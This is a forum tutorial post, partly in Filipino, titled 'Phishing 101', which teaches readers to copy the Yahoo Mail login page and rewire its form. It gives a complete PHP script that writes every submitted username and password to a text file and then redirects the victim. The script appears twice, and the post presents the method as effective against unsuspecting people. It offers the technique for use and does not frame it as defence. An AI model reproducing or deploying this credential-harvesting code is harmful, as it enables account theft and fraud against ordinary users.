Most of our features and services are available only to our members. So we encourage you to login or join us by registering a new account. Registration is free, fast, and simple. You only need to provide a valid email address so we can minimize spammers. As a Symbianize member you'll have the following privileges:
Gain access to private forums and restricted features
Reply and create new topics or polls
Download free applications, games, themes, graphics, tones, videos, etc.
Ask question or support related to mobile phone, computer, game console, and multimedia
Private messaging (PM) with fellow members
Communicate instantly or real-time with currently online members via Shout Box
All that and more, so what are you waiting for, join us now! Ito ang website na ginawa ng pinoy para sa pinoy!
Web & InternetAll topics pertaining to the web and the internet. Talk about anything related to web building and designing, site reviews, online marketing and services, file hosting, search engines, and other interesting websites.
[TUT]Phishing 101 - learn to create fake facebook, yahoomail, paypal
LEARN TO CREATE FAKE FACEBOOK, YAHOO, GMAIL ETC.
napansin ko kulang ang mga sagot sa mga nagtatanong sa ibang thread at madalas di nasasagot ang tanong or kung curious kayo sa lumang method nato but proven effective sa unsuspicious na tao so eto ibibigay ko ang tutorial, hindi ako magaling mag spoon fed so kelangan makuha nyo ang idea at pattern sa pag gawa ng fake login page or so called phishing
wamp server (for testing purposes, but not really necessary)
step by step guide:
FAKE LOGIN PAGE
go to yahoomail.com, copy souce code
open notepad then paste the code there
find the word
Quote:
form method="post"
change it to
Quote:
form method="get"
find
Quote:
action="https://login.yahoo.com/config/login?"
change it to
Quote:
action="ymhack.php"
were done with the fake login page, save it as yahoo.php but remember to change the save as type to ALL FILES (fake login page wont work if not saved correctly)
SCRIPT
open another notepad and paste this
Quote:
<?php
header("Location: *Only fully-registered users can see this link.* ");
$handle = fopen("ympass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
you dont have to change anything here
were done with the script page, save it as ymhack.php but remember to change the save as type to ALL FILES (fake login page wont work if not saved correctly)
SCRIPT
open another blank notepad and save it as
Quote:
ympass.txt
and were done with yahoomail phishing!next will be facebook but let me take a break first
**Should you require more info about this matter please feel free to contact me or reply to this thread at your convenience
were done with the fake login page, save it as yahoo.php but remember to change the save as type to ALL FILES (fake login page wont work if not saved correctly)
SCRIPT
open another notepad and paste this
Quote:
<?php
header("Location: *Only fully-registered users can see this link.* ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
you dont have to change anything here
were done with the script page, save it as ymhack.php but remember to change the save as type to ALL FILES (fake login page wont work if not saved correctly)